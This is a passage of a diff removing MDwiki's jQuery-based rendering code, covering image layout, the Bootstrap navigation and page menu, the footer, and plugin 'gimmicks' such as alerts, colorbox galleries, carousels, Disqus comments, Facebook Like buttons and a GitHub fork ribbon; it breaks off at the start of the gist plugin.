-			if ($.trim($p.text ()).length === 0) {
-				// make sure no whitespace are in the p and then exit
-				//$p.text ('');
-				return;
-			}
-			// children elements of the p
-            var children = $p.contents ().filter (function () {
-                var $child =  $(this);
-                // we extract images and hyperlinks with images out of the paragraph
-                if (this.tagName === 'A' && $child.find('img').length > 0) {
-                    return true;
-                }
-                if (this.tagName === 'IMG') {
-                    return true;
-                }
-                // else
-                return false;
-            });
-            var floatClass = getFloatClass($p);
-            $p.wrapInner ('<div class="md-text" />');
-
-            // if there are no children, we are done
-            if (children.length === 0) {
-                return;
-            }
-            // move the children out of the wrapped div into the original p
-            children.prependTo($p);
-
-            // at this point, we now have a paragraph that holds text AND images
-            // we mark that paragraph to be a floating environment
-            // TODO determine floatenv left/right
-            $p.addClass ('md-floatenv').addClass (floatClass);
-		});
-	}
-	function removeBreaks (){
-		// since we use non-markdown-standard line wrapping, we get lots of
-		// <br> elements we don't want.
-
-        // remove a leading <br> from floatclasses, that happen to
-        // get insertet after an image
-        $('.md-floatenv').find ('.md-text').each (function () {
-            var $first = $(this).find ('*').eq(0);
-            if ($first.is ('br')) {
-                $first.remove ();
-            }
-        });
-
-        // remove any breaks from image groups
-        $('.md-image-group').find ('br').remove ();
-    }
-	function getFloatClass (par) {
-		var $p = $(par);
-		var floatClass = '';
-
-		// reduce content of the paragraph to images
-		var nonTextContents = $p.contents().filter(function () {
-			if (this.tagName === 'IMG' || this.tagName === 'IFRAME') {
-                return true;
-            }
-			else if (this.tagName === 'A') {
-                return $(this).find('img').length > 0;
-            }
-			else {
-				return $.trim($(this).text ()).length > 0;
-			}
-		});
-		// check the first element - if its an image or a link with image, we go left
-		var elem = nonTextContents[0];
-		if (elem !== undefined && elem !== null) {
-			if (elem.tagName === 'IMG' || elem.tagName === 'IFRAME') {
-                floatClass = 'md-float-left';
-            }
-			else if (elem.tagName === 'A' && $(elem).find('img').length > 0) {
-                floatClass = 'md-float-left';
-            }
-			else {
-                floatClass = 'md-float-right';
-            }
-		}
-		return floatClass;
-	}
-    // images are put in the same image group as long as there is
-    // not separating paragraph between them
-    function groupImages() {
-        var par = $('p img').parents('p');
-        // add an .md-image-group class to the p
-        par.addClass('md-image-group');
-    }
-
-    // takes a standard <img> tag and adds a hyperlink to the image source
-    // needed since we scale down images via css and want them to be accessible
-    // in original format
-    function linkImagesToSelf () {
-        function selectNonLinkedImages () {
-            // only select images that do not have a non-empty parent link
-            $images = $('img').filter(function(index) {
-                var $parent_link = $(this).parents('a').eq(0);
-                if ($parent_link.length === 0) return true;
-                var attr = $parent_link.attr('href');
-                return (attr && attr.length === 0);
-            });
-            return $images;
-        }
-        var $images = selectNonLinkedImages ();
-        return $images.each(function() {
-            var $this = $(this);
-            var img_src = $this.attr('src');
-            var img_title = $this.attr('title');
-            if (img_title === undefined) {
-                img_title = '';
-            }
-            // wrap the <img> tag in an anchor and copy the title of the image
-            $this.wrap('<a class="md-image-selfref" href="' + img_src + '" title="'+ img_title +'"/> ');
-        });
-    }
-
-    function addInpageAnchors()
-    {
-        // adds a pilcrow (paragraph) character to heading with a link for the
-        // inpage anchor
-        function addPilcrow ($heading, href) {
-            var c = $.md.config.anchorCharacter;
-            var $pilcrow = $('<span class="anchor-highlight"><a>' + c + '</a></span>');
-            $pilcrow.find('a').attr('href', href);
-            $pilcrow.hide();
-
-            var mouse_entered = false;
-            $heading.mouseenter(function () {
-                mouse_entered = true;
-                $.md.util.wait(300).then(function () {
-                    if (!mouse_entered) return;
-                    $pilcrow.fadeIn(200);
-                });
-            });
-            $heading.mouseleave(function () {
-                mouse_entered = false;
-                $pilcrow.fadeOut(200);
-            });
-            $pilcrow.appendTo($heading);
-        }
-
-        // adds a link to the navigation at the top of the page
-        function addJumpLinkToTOC($heading) {
-            if($.md.config.useSideMenu === false) return;
-            if($heading.prop("tagName") !== 'H2') return;
-
-            var c = $.md.config.tocAnchor;
-            if (c === '')
-                return;
-
-            var $jumpLink = $('<a class="visible-xs visible-sm jumplink" href="#md-page-menu">' + c + '</a>');
-            $jumpLink.click(function(ev) {
-                ev.preventDefault();
-
-                $('body').scrollTop($('#md-page-menu').position().top);
-            });
-
-            if ($heading.parents('#md-menu').length === 0) {
-                $jumpLink.insertAfter($heading);
-            }
-        }
-
-        // adds a page inline anchor to each h1,h2,h3,h4,h5,h6 element
-        // which can be accessed by the headings text
-        $('h1,h2,h3,h4,h5,h6').not('#md-title h1').each (function () {
-            var $heading = $(this);
-            $heading.addClass('md-inpage-anchor');
-            var text = $heading.clone().children('.anchor-highlight').remove().end().text();
-            var href = $.md.util.getInpageAnchorHref(text);
-            addPilcrow($heading, href);
-
-            //add jumplink to table of contents
-            addJumpLinkToTOC($heading);
-        });
-    }
-
-    $.md.scrollToInPageAnchor = function(anchortext) {
-        if (anchortext.startsWith ('#'))
-            anchortext = anchortext.substring (1, anchortext.length);
-        // we match case insensitive
-        var doBreak = false;
-        $('.md-inpage-anchor').each (function () {
-            if (doBreak) { return; }
-            var $this = $(this);
-            // don't use the text of any subnode
-            var text = $this.toptext();
-            var match = $.md.util.getInpageAnchorText (text);
-            if (anchortext === match) {
-                this.scrollIntoView (true);
-                var navbar_offset = $('.navbar-collapse').height() + 5;
-                window.scrollBy(0, -navbar_offset + 5);
-                doBreak = true;
-            }
-        });
-    };
-
-}(jQuery));
-
-(function($) {
-    'use strict';
-    // call the gimmick
-    $.mdbootstrap = function (method){
-        if ($.mdbootstrap.publicMethods[method]) {
-            return $.mdbootstrap.publicMethods[method].apply(this, Array.prototype.slice.call(arguments, 1));
-        } else {
-            $.error('Method ' + method + ' does not exist on jquery.mdbootstrap');
-        }
-    };
-    // simple wrapper around $().bind
-    $.mdbootstrap.events = [];
-    $.mdbootstrap.bind =  function (ev, func) {
-        $(document).bind (ev, func);
-        $.mdbootstrap.events.push (ev);
-    };
-    $.mdbootstrap.trigger = function (ev) {
-        $(document).trigger (ev);
-    };
-
-    var navStyle = '';
-
-    // PUBLIC API functions that are exposed
-    var publicMethods = {
-        bootstrapify: function () {
-            createPageSkeleton();
-            buildMenu ();
-            changeHeading();
-            replaceImageParagraphs();
-
-            $('table').addClass('table').addClass('table-bordered');
-            //pullRightBumper ();
-
-            // remove the margin for headings h1 and h2 that are the first
-            // on page
-            //if (navStyle == "sub" || (navStyle == "top" && $('#md-title').text ().trim ().length === 0))
-            //    $(".md-first-heading").css ("margin-top", "0");
-
-            // external content should run after gimmicks were run
-            $.md.stage('pregimmick').subscribe(function(done) {
-                if ($.md.config.useSideMenu !== false) {
-                    createPageContentMenu();
-                }
-                addFooter();
-                addAdditionalFooterText();
-                done();
-            });
-            $.md.stage('postgimmick').subscribe(function(done) {
-                adjustExternalContent();
-                highlightActiveLink();
-
-                done();
-            });
-        }
-    };
-    // register the public API functions
-    $.mdbootstrap.publicMethods = $.extend ({}, $.mdbootstrap.publicMethods, publicMethods);
-
-    // PRIVATE FUNCTIONS:
-
-    function buildTopNav() {
-        // replace with the navbar skeleton
-        if ($('#md-menu').length <= 0) {
-            return;
-        }
-        navStyle = 'top';
-        var $menuContent = $('#md-menu').children();
-
-        // $('#md-menu').addClass ('navbar navbar-default navbar-fixed-top');
-        // var menusrc = '';
-        // menusrc += '<div id="md-menu-inner" class="container">';
-        // menusrc += '<ul id="md-menu-ul" class="nav navbar-nav">';
-        // menusrc += '</ul></div>';
-
-        var navbar = '';
-        navbar += '<div id="md-main-navbar" class="navbar navbar-default navbar-fixed-top" role="navigation">';
-        navbar +=   '<div class="navbar-header">';
-        navbar +=     '<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">';
-        navbar +=       '<span class="sr-only">Toggle navigation</span>';
-        navbar +=       '<span class="icon-bar"></span>';
-        navbar +=       '<span class="icon-bar"></span>';
-        navbar +=       '<span class="icon-bar"></span>';
-        navbar +=     '</button>';
-        navbar +=     '<a class="navbar-brand" href="#"></a>';
-        navbar +=   '</div>';
-
-        navbar +=   '<div class="collapse navbar-collapse navbar-ex1-collapse">';
-        navbar +=     '<ul class="nav navbar-nav" />';
-        navbar +=     '<ul class="nav navbar-nav navbar-right" />';
-        navbar +=   '</div>';
-        navbar += '</div>';
-        var $navbar = $(navbar);
-
-        $navbar.appendTo('#md-menu');
-        // .eq(0) becase we dont want navbar-right to be appended to
-        $('#md-menu ul.nav').eq(0).append($menuContent);
-
-        // the menu should be the first element in the body
-        $('#md-menu').prependTo ('#md-all');
-
-        var brand_text = $('#md-menu h1').toptext();
-        $('#md-menu h1').remove();
-        $('a.navbar-brand').text(brand_text);
-
-        // initial offset
-        $('#md-body').css('margin-top', '70px');
-        $.md.stage('pregimmick').subscribe(function (done) {
-            check_offset_to_navbar();
-            done();
-        });
-    }
-    // the navbar has different height depending on theme, number of navbar entries,
-    // and window/device width. Therefore recalculate on start and upon window resize
-    function set_offset_to_navbar () {
-        var height = $('#md-main-navbar').height() + 10;
-        $('#md-body').css('margin-top', height + 'px');
-    }
-    function check_offset_to_navbar () {
-        // HACK this is VERY UGLY. When an external theme is used, we don't know when the
-        // css style will be finished loading - and we can only correctly calculate
-        // the height AFTER it has completely loaded.
-        var navbar_height = 0;
-
-        var dfd1 = $.md.util.repeatUntil(40, function() {
-            navbar_height = $('#md-main-navbar').height();
-            return (navbar_height > 35) && (navbar_height < 481);
-        }, 25);
-
-        dfd1.done(function () {
-            navbar_height = $('#md-main-navbar').height();
-            set_offset_to_navbar();
-            // now bootstrap changes this maybe after a while, again watch for changes
-            var dfd2 = $.md.util.repeatUntil(20, function () {
-                return navbar_height !== $('#md-main-navbar').height();
-            }, 25);
-            dfd2.done(function() {
-                // it changed, so we need to change it again
-                set_offset_to_navbar();
-            });
-            // and finally, for real slow computers, make sure it is changed if changin very late
-            $.md.util.wait(2000).done(function () {
-                set_offset_to_navbar();
-            });
-        });
-    }
-    function buildSubNav() {
-        // replace with the navbar skeleton
-        /* BROKEN CODE
-        if ($('#md-menu').length <= 0) {
-            return;
-        }
-        navStyle = 'sub';
-        var $menuContent = $('#md-menu').html ();
-
-        var menusrc = '';
-        menusrc += '<div id="md-menu-inner" class="subnav">';
-        menusrc += '<ul id="md-menu-ul" class="nav nav-pills">';
-        menusrc += $menuContent;
-        menusrc += '</ul></div>';
-        $('#md-menu').empty();
-        $('#md-menu').wrapInner($(menusrc));
-        $('#md-menu').addClass ('col-md-12');
-
-        $('#md-menu-container').insertAfter ($('#md-title-container'));
-        */
-    }
-
-    function buildMenu () {
-        if ($('#md-menu a').length === 0) {
-            return;
-        }
-        var h = $('#md-menu');
-
-        // make toplevel <a> a dropdown
-        h.find('> a[href=""]')
-            .attr('data-toggle', 'dropdown')
-            .addClass('dropdown-toggle')
-            .attr('href','')
-            .append('<b class="caret"/>');
-        h.find('ul').addClass('dropdown-menu');
-        h.find('ul li').addClass('dropdown');
-
-        // replace hr with dividers
-        $('#md-menu hr').each(function(i,e) {
-            var hr = $(e);
-            var prev = hr.prev();
-            var next = hr.next();
-            if (prev.is('ul') && prev.length >= 0) {
-                prev.append($('<li class="divider"/>'));
-                hr.remove();
-                if (next.is('ul')) {
-                    next.find('li').appendTo(prev);
-                    next.remove();
-                }
-                // next ul should now be empty
-            }
-            return;
-        });
-
-        // remove empty uls
-        $('#md-menu ul').each(function(i,e) {
-            var ul = $(e);
-            if (ul.find('li').length === 0) {
-                ul.remove();
-            }
-        });
-
-        $('#md-menu hr').replaceWith($('<li class="divider-vertical"/>'));
-
-
-        // wrap the toplevel links in <li>
-        $('#md-menu > a').wrap('<li />');
-        $('#md-menu ul').each(function(i,e) {
-            var ul = $(e);
-            ul.appendTo(ul.prev());
-            ul.parent('li').addClass('dropdown');
-        });
-
-        // submenu headers
-        $('#md-menu li.dropdown').find('h1, h2, h3').each(function(i,e) {
-            var $e = $(e);
-            var text = $e.toptext();
-            var header = $('<li class="dropdown-header" />');
-            header.text(text);
-            $e.replaceWith(header);
-        });
-
-        // call the user specifed menu function
-        buildTopNav();
-    }
-    function isVisibleInViewport(e) {
-        var el = $(e);
-        var top = $(window).scrollTop();
-        var bottom = top + $(window).height();
-
-        var eltop = el.offset().top;
-        var elbottom = eltop + el.height();
-
-        return (elbottom <= bottom) && (eltop >= top);
-    }
-
-    function createPageContentMenu () {
-
-        // assemble the menu
-        var $headings = $('#md-content').find('h2').clone();
-        // we dont want the text of any child nodes
-        $headings.children().remove();
-
-        if ($headings.length <= 1) {
-            return;
-        }
-
-        $('#md-content').removeClass ('col-md-12');
-        $('#md-content').addClass ('col-md-9');
-        $('#md-content-row').prepend('<div class="col-md-3" id="md-left-column"/>');
-
-        var recalc_width = function () {
-            // if the page menu is affixed, it is not a child of the
-            // <md-left-column> anymore and therefore does not inherit
-            // its width. On every resize, change the class accordingly
-            var width_left_column = $('#md-left-column').css('width');
-            $('#md-page-menu').css('width', width_left_column);
-        };
-
-        $(window).scroll(function() {
-            recalc_width($('#md-page-menu'));
-            var $first;
-            $('*.md-inpage-anchor').each(function(i,e) {
-                if ($first === undefined) {
-                    var h = $(e);
-                    if (isVisibleInViewport(h)) {
-                        $first = h;
-                    }
-                }
-            });
-            // highlight in the right menu
-            $('#md-page-menu a').each(function(i,e) {
-                var $a = $(e);
-                if ($first && $a.toptext() === $first.toptext()) {
-                    $('#md-page-menu a.active').removeClass('active');
-                    //$a.parent('a').addClass('active');
-                    $a.addClass('active');
-                }
-            });
-        });
-
-
-        var affixDiv = $('<div id="md-page-menu" />');
-
-        //var top_spacing = $('#md-menu').height() + 15;
-        var top_spacing = 70;
-        affixDiv.affix({
-            //offset: affix.position() - 50,
-            offset: 130
-        });
-        affixDiv.css('top', top_spacing);
-        //affix.css('top','-250px');
-
-        var $pannel = $('<div class="panel panel-default"><ul class="list-group"/></div>');
-        var $ul = $pannel.find("ul");
-        affixDiv.append($pannel);
-
-        $headings.each(function(i,e) {
-            var $heading = $(e);
-            var $li = $('<li class="list-group-item" />');
-            var $a = $('<a />');
-            $a.attr('href', $.md.util.getInpageAnchorHref($heading.toptext()));
-            $a.click(function(ev) {
-                ev.preventDefault();
-
-                var $this = $(this);
-                var anchortext = $.md.util.getInpageAnchorText($this.toptext());
-                $.md.scrollToInPageAnchor(anchortext);
-            });
-            $a.text($heading.toptext());
-            $li.append($a);
-            $ul.append($li);
-        });
-
-        $(window).resize(function () {
-            recalc_width($('#md-page-menu'));
-            check_offset_to_navbar();
-        });
-        $.md.stage('postgimmick').subscribe(function (done) {
-            // recalc_width();
-            done();
-        });
-
-        //menu.css('width','100%');
-        $('#md-left-column').append(affixDiv);
-
-    }
-
-    function createPageSkeleton() {
-
-        $('#md-title').wrap('<div class="container" id="md-title-container"/>');
-        $('#md-title').wrap('<div class="row" id="md-title-row"/>');
-
-        $('#md-menu').wrap('<div class="container" id="md-menu-container"/>');
-        $('#md-menu').wrap('<div class="row" id="md-menu-row"/>');
-
-        $('#md-content').wrap('<div class="container" id="md-content-container"/>');
-        $('#md-content').wrap('<div class="row" id="md-content-row"/>');
-
-        $('#md-body').wrap('<div class="container" id="md-body-container"/>');
-        $('#md-body').wrap('<div class="row" id="md-body-row"/>');
-
-        $('#md-title').addClass('col-md-12');
-        $('#md-content').addClass('col-md-12');
-
-    }
-    function pullRightBumper (){
- /*     $("span.bumper").each (function () {
-			$this = $(this);
-			$this.prev().addClass ("pull-right");
-		});
-		$('span.bumper').addClass ('pull-right');
-*/
-    }
-
-    function changeHeading() {
-
-        // HEADING
-        var jumbo = $('<div class="page-header" />');
-        $('#md-title').wrapInner(jumbo);
-    }
-
-    function highlightActiveLink () {
-        // when no menu is used, return
-        if ($('#md-menu').find ('li').length === 0) {
-            return;
-        }
-		var filename = window.location.hash;
-
-		if (filename.length === 0) {
-            filename = '#!index.md';
-        }
-		var selector = 'li:has(a[href="' + filename + '"])';
-		$('#md-menu').find (selector).addClass ('active');
-    }
-
-    // replace all <p> around images with a <div class="thumbnail" >
-    function replaceImageParagraphs() {
-
-        // only select those paragraphs that have images in them
-        var $pars = $('p img').parents('p');
-        $pars.each(function() {
-            var $p = $(this);
-            var $images = $(this).find('img')
-                .filter(function() {
-                    // only select those images that have no parent anchor
-                    return $(this).parents('a').length === 0;
-                })
-                // add those anchors including images
-                .add($(this).find ('img'))
-                .addClass('img-responsive')
-                .addClass('img-thumbnail');
-
-            // create a new url group at the fron of the paragraph
-            //$p.prepend($('<ul class="thumbnails" />'));
-            // move the images to the newly created ul
-            //$p.find('ul').eq(0).append($images);
-
-            // wrap each image with a <li> that limits their space
-            // the number of images in a paragraphs determines thei width / span
-
-            // if the image is a link, wrap around the link to avoid
-            function wrapImage ($imgages, wrapElement) {
-                return $images.each(function (i, img) {
-                    var $img = $(img);
-                    var $parent_img = $img.parent('a');
-                    if ($parent_img.length > 0)
-                        $parent_img.wrap(wrapElement);
-                    else
-                        $img.wrap(wrapElement);
-                });
-            }
-
-            if ($p.hasClass ('md-floatenv')) {
-                if ($images.length === 1) {
-                    wrapImage($images, '<div class="col-sm-8" />');
-                } else if ($images.length === 2) {
-                    wrapImage($images, '<div class="col-sm-4" />');
-                } else {
-                    wrapImage($images, '<div class="col-sm-2" />');
-                }
-            } else {
-
-                // non-float => images are on their own single paragraph, make em larger
-                // but remember, our image resizing will make them only as large as they are
-                // but do no upscaling
-                // TODO replace by calculation
-
-                if ($images.length === 1) {
-                    wrapImage($images, '<div class="col-sm-12" />');
-                } else if ($images.length === 2) {
-                    wrapImage($images, '<div class="col-sm-6" />');
-                } else if ($images.length === 3) {
-                    wrapImage($images, '<div class="col-sm-4" />');
-                } else if ($images.length === 4) {
-                    wrapImage($images, '<div class="col-sm-3" />');
-                } else {
-                    wrapImage($images, '<div class="col-sm-2" />');
-                }
-            }
-            $p.addClass('row');
-            // finally, every img gets its own wrapping thumbnail div
-            //$images.wrap('<div class="thumbnail" />');
-        });
-
-        // apply float to the ul thumbnails
-        //$('.md-floatenv.md-float-left ul').addClass ('pull-left');
-        //$('.md-floatenv.md-float-right ul').addClass ('pull-right');
-    }
-
-    function adjustExternalContent() {
-        // external content are usually iframes or divs that are integrated
-        // by gimmicks
-        // example: youtube iframes, google maps div canvas
-        // all external content are in the md-external class
-
-        $('iframe.md-external').not ('.md-external-nowidth')
-            .attr('width', '450')
-            .css ('width', '450px');
-
-        $('iframe.md-external').not ('.md-external-noheight')
-            .attr('height', '280')
-            .css ('height', '280px');
-
-        // make it appear like an image thumbnal
-        //$('.md-external').addClass('img-thumbnail');
-
-        //.wrap($("<ul class='thumbnails' />")).wrap($("<li class='col-md-6' />"));
-        $('div.md-external').not('.md-external-noheight')
-            .css('height', '280px');
-        $('div.md-external').not('.md-external-nowidth')
-            .css('width', '450px');
-
-        // // make it appear like an image thumbnal
-        // $("div.md-external").addClass("thumbnail").wrap($("<ul class='thumbnails' />")).wrap($("<li class='col-md-10' />"));
-
-        // $("div.md-external-large").css('width', "700px")
-    }
-
-    // note: the footer is part of the GPLv3 legal information
-    // and may not be removed or hidden to comply with licensing conditions.
-    function addFooter() {
-        var navbar = '';
-        navbar += '<hr><div class="scontainer">';
-        navbar +=   '<div class="pull-right md-copyright-footer"> ';
-        navbar +=     '<span id="md-footer-additional"></span>';
-        navbar +=     'Website generated with <a href="http://www.mdwiki.info">MDwiki</a> ';
-        navbar +=     '&copy; Timo D&ouml;rr and contributors. ';
-        navbar +=   '</div>';
-        navbar += '</div>';
-        var $navbar = $(navbar);
-        $navbar.css('position', 'relative');
-        $navbar.css('margin-top', '1em');
-        $('#md-all').append ($navbar);
-    }
-
-    function addAdditionalFooterText () {
-        var text = $.md.config.additionalFooterText;
-        if (text) {
-            $('.md-copyright-footer #md-footer-additional').html(text);
-        }
-    }
-}(jQuery));
-
-(function($) {
-    $.gimmicks = $.fn.gimmicks = function(method) {
-        if (method === undefined) {
-            return;
-        }
-        // call the gimmick
-        if ($.fn.gimmicks.methods[method]) {
-            return $.fn.gimmicks.methods[method].apply(this, Array.prototype.slice.call(arguments, 1));
-        } else {
-            $.error('Gimmick ' + method + ' does not exist on jQuery.gimmicks');
-        }
-    };
-
-    // TODO underscores _ in Markdown links are not allowed! bug in our MD imlemenation
-
-
-}(jQuery));
-
-(function($) {
-    //'use strict';
-    var alertsGimmick = {
-        name: 'alerts',
-        // TODO
-        //version: $.md.version,
-        load: function() {
-            $.md.stage('bootstrap').subscribe(function(done) {
-                createAlerts();
-                done();
-            });
-        }
-    };
-    $.md.registerGimmick(alertsGimmick);
-
-    // takes a standard <img> tag and adds a hyperlink to the image source
-    // needed since we scale down images via css and want them to be accessible
-    // in original format
-    function createAlerts() {
-        var matches = $(select_paragraphs());
-        matches.each(function() {
-            var $p = $(this.p);
-            var type = this.alertType;
-            $p.addClass('alert');
-
-            if (type === 'note') {
-                $p.addClass('alert-info');
-            } else if (type === 'hint') {
-                $p.addClass('alert-success');
-            } else if (type === 'warning') {
-                $p.addClass('alert-warning');
-            }
-        });
-    }
-
-    // picks out the paragraphs that start with a trigger word
-    function select_paragraphs() {
-        var note = ['note', 'beachte' ];
-        var warning = [ 'achtung', 'attention', 'warnung', 'warning', 'atención', 'guarda', 'advertimiento' ];
-        var hint = ['hint', 'tipp', 'tip', 'hinweis'];
-        var exp = note.concat(warning);
-        exp = exp.concat(hint);
-        var matches = [];
-
-        $('p').filter (function () {
-            var $par = $(this);
-            // check against each expression
-            $(exp).each (function (i,trigger) {
-                var txt = $par.text().toLowerCase ();
-                // we match only paragrachps in which the 'trigger' expression
-                // is follow by a ! or :
-                var re = new RegExp (trigger + '(:|!)+.*','i');
-                var alertType = 'none';
-                if (txt.match (re) !== null) {
-                    if ($.inArray(trigger, note) >= 0) {
-                        alertType = 'note';
-                    } else if ($.inArray(trigger, warning) >= 0) {
-                        alertType = 'warning';
-                    } else if ($.inArray(trigger, hint) >= 0) {
-                        alertType = 'hint';
-                    }
-                    matches.push ({
-                        p: $par,
-                        alertType: alertType
-                    });
-                }
-            });
-        });
-        return matches;
-    }
-}(jQuery));
-
-(function($) {
-    // makes trouble, find out why
-    //'use strict';
-    var colorboxGimmick = {
-        name: 'colorbox',
-        load: function() {
-            $.md.stage('gimmick').subscribe(function(done) {
-                $.gimmicks('colorbox');
-                done();
-            });
-        }
-    };
-    $.md.registerGimmick(colorboxGimmick);
-
-    var methods = {
-        // takes a standard <img> tag and adds a hyperlink to the image source
-        // needed since we scale down images via css and want them to be accessible
-        // in original format
-        colorbox: function() {
-            var $image_groups;
-            if (!(this instanceof jQuery)) {
-                // select the image groups of the page
-                $image_groups = $('.md-image-group');
-            } else {
-                $image_groups = $(this);
-            }
-            // operate on md-image-group, which holds one
-            // or more images that are to be colorbox'ed
-            var counter = 0;
-            return $image_groups.each(function() {
-                var $this = $(this);
-
-                // each group requires a unique name
-                var gal_group = 'gallery-group-' + (counter++);
-
-                // create a hyperlink around the image
-                $this.find('a.md-image-selfref img')
-                // filter out images that already are a hyperlink
-                // (so won't be part of the gallery)
-
-                // apply colorbox on their parent anchors
-                .parents('a').colorbox({
-                    rel: gal_group,
-                    opacity: 0.75,
-                    slideshow: true,
-                    maxWidth: '95%',
-                    maxHeight: '95%',
-                    scalePhotos: true,
-                    photo: true,
-                    slideshowAuto: false
-                });
-            });
-        }
-    };
-    $.gimmicks.methods = $.extend({}, $.fn.gimmicks.methods, methods);
-}(jQuery));
-
-(function($) {
-    'use strict';
-
-    var themeChooserGimmick = {
-        name: 'Themes',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'carousel', carousel);
-        }
-    };
-    $.md.registerGimmick(themeChooserGimmick);
-
-    function carousel($link, opt, href) {
-
-        var $c = $('<div id="myCarousel" class="carousel slide"></div>');
-        var $d = $('<div class="carousel-inner"/>');
-        $c.append('<ol class="carousel-indicators" />');
-
-        var imageUrls = [];
-        var i = 0;
-        $.each(href.split(','), function(i, e) {
-            imageUrls.push($.trim(e));
-            $c.find('ol').append('<li data-target="#myCarousel" data-slide-to="' + i + '" class="active" /');
-            var div;
-            if (i === 0) {
-                div = ('<div class="active item"/>');
-            } else {
-                div = ('<div class="item"/>');
-            }
-            $d.append($(div).append('<img src="' + e + '"/>'));
-        });
-        $c.append($d);
-        $c.append('<a class="carousel-control left" href="#myCarousel" data-slide="prev">&lsaquo;</a>');
-        $c.append('<a class="carousel-control right" href="#myCarousel" data-slide="next">&rsaquo;</a>');
-        $link.replaceWith($c);
-    }
-}(jQuery));
-
-(function($) {
-    var disqusGimmick = {
-        name: 'disqus',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'disqus', disqus);
-        }
-    };
-    $.md.registerGimmick(disqusGimmick);
-
-    var alreadyDone = false;
-    var disqus = function($links, opt, text) {
-        var default_options = {
-            identifier: ''
-        };
-        var options = $.extend (default_options, opt);
-        var disqus_div = $('<div id="disqus_thread" class="md-external md-external-noheight md-external-nowidth" >' + '<a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></div>');
-        disqus_div.css ('margin-top', '2em');
-        return $links.each(function(i,link) {
-            if (alreadyDone === true) {
-                return;
-            }
-            alreadyDone = true;
-
-            var $link = $(link);
-            var disqus_shortname = $link.attr('href');
-
-            if (disqus_shortname !== undefined && disqus_shortname.length > 0) {
-                // insert the div
-                $link.remove ();
-                // since disqus need lot of height, always but it on the bottom of the page
-                $('#md-content').append(disqus_div);
-                if ($('#disqus_thread').length > 0) {
-                    (function() {
-                        // all disqus_ variables are used by the script, they
-                        // change the config behavious.
-                        // see: http://help.disqus.com/customer/portal/articles/472098-javascript-configuration-variables
-
-                        // set to 1 if developing, or the site is password protected or not
-                        // publicaly accessible
-                        //var disqus_developer = 1;
-
-                        // by default, disqus will use the current url to determine a thread
-                        // since we might have different parameters present, we remove them
-                        // disqus_* vars HAVE TO BE IN GLOBAL SCOPE
-                        var disqus_url = window.location.href;
-                        var disqus_identifier;
-                        if (options.identifier.length > 0) {
-                            disqus_identifier = options.identifier;
-                        } else {
-                            disqus_identifier = disqus_url;
-                        }
-
-                        // dynamically load the disqus script
-                        var dsq = document.createElement('script');
-                        dsq.type = 'text/javascript';
-                        dsq.async = true;
-                        dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js';
-                        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
-                    })();
-                }
-            }
-        });
-    };
-}(jQuery));
-
-(function($) {
-    var language = window.navigator.userLanguage || window.navigator.language;
-    var code = language + "_" + language.toUpperCase();
-    var fbRootDiv = $('<div id="fb-root" />');
-    var fbScriptHref = $.md.prepareLink ('connect.facebook.net/' + code + '/all.js#xfbml=1', { forceHTTP: true });
-    var fbscript ='(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "' + fbScriptHref + '"; fjs.parentNode.insertBefore(js, fjs);}(document, "script", "facebook-jssdk"));';
-
-    var facebookLikeGimmick = {
-        name: 'FacebookLike',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'facebooklike', facebooklike);
-            $.md.registerScript(this, fbscript, {
-                license: 'APACHE2',
-                loadstage: 'postgimmick',
-                finishstage: 'all_ready'
-            });
-        }
-    };
-    $.md.registerGimmick(facebookLikeGimmick);
-
-    function facebooklike($link, opt, text) {
-        var default_options = {
-            layout: 'standard',
-            showfaces: true
-        };
-        var options = $.extend ({}, default_options, opt);
-        // Due to a bug, we can have underscores _ in a markdown link
-        // so we insert the underscores needed by facebook here
-        if (options.layout === 'boxcount') {
-            options.layout = 'box_count';
-        }
-        if (options.layout === 'buttoncount') {
-            options.layout = 'button_count';
-        }
-
-        return $link.each(function(i,e) {
-            var $this = $(e);
-            var href = $this.attr('href');
-            $('body').append(fbRootDiv);
-
-            var $fb_div = $('<div class="fb-like" data-send="false" data-width="450"></div>');
-            $fb_div.attr ('data-href', href);
-            $fb_div.attr ('data-layout', options.layout);
-            $fb_div.attr ('data-show-faces', options.showfaces);
-
-            $this.replaceWith ($fb_div);
-        });
-    }
-}(jQuery));
-
-(function($) {
-    'use strict';
-    var forkmeongithubGimmick = {
-        name: 'forkmeongithub',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'forkmeongithub', forkmeongithub);
-        }
-    };
-    $.md.registerGimmick(forkmeongithubGimmick);
-
-    function forkmeongithub($links, opt, text) {
-        return $links.each (function (i, link){
-            var $link = $(link);
-            // default options
-            var default_options = {
-                color: 'red',
-                position : 'right'
-            };
-            var options = $.extend ({}, default_options, opt);
-            var color = options.color;
-            var pos = options.position;
-
-            // the filename for the ribbon
-            // see: https://github.com/blog/273-github-ribbons
-            var base_href = 'https://s3.amazonaws.com/github/ribbons/forkme_';
-
-            if (color === 'red') {
-                base_href += pos + '_red_aa0000.png';
-            }
-            if (color === 'green') {
-                base_href += pos + '_green_007200.png';
-            }
-            if (color === 'darkblue') {
-                base_href += pos + '_darkblue_121621.png';
-            }
-            if (color === 'orange') {
-                base_href += pos + '_orange_ff7600.png';
-            }
-            if (color === 'white') {
-                base_href += pos + '_white_ffffff.png';
-            }
-            if (color === 'gray') {
-                base_href += pos + '_gray_6d6d6d.png';
-            }
-
-            var href = $link.attr('href');
-    //                var body_pos_top = $('#md-body').offset ().top;
-            var body_pos_top = 0;
-            var github_link = $('<a class="forkmeongithub" href="'+ href +'"><img style="position: absolute; top: ' + body_pos_top + ';'+pos+': 0; border: 0;" src="'+base_href+'" alt="Fork me on GitHub"></a>');
-            // to avoid interfering with other div / scripts, we remove the link and prepend it to the body
-            // the fork me ribbon is positioned absolute anyways
-            $('body').prepend (github_link);
-            github_link.find('img').css ('z-index', '2000');
-            $link.remove();
-        });
-    }
-
-}(jQuery));
-
-(function($){
-    'use strict';
-    var gistGimmick = {
-        name: 'gist',
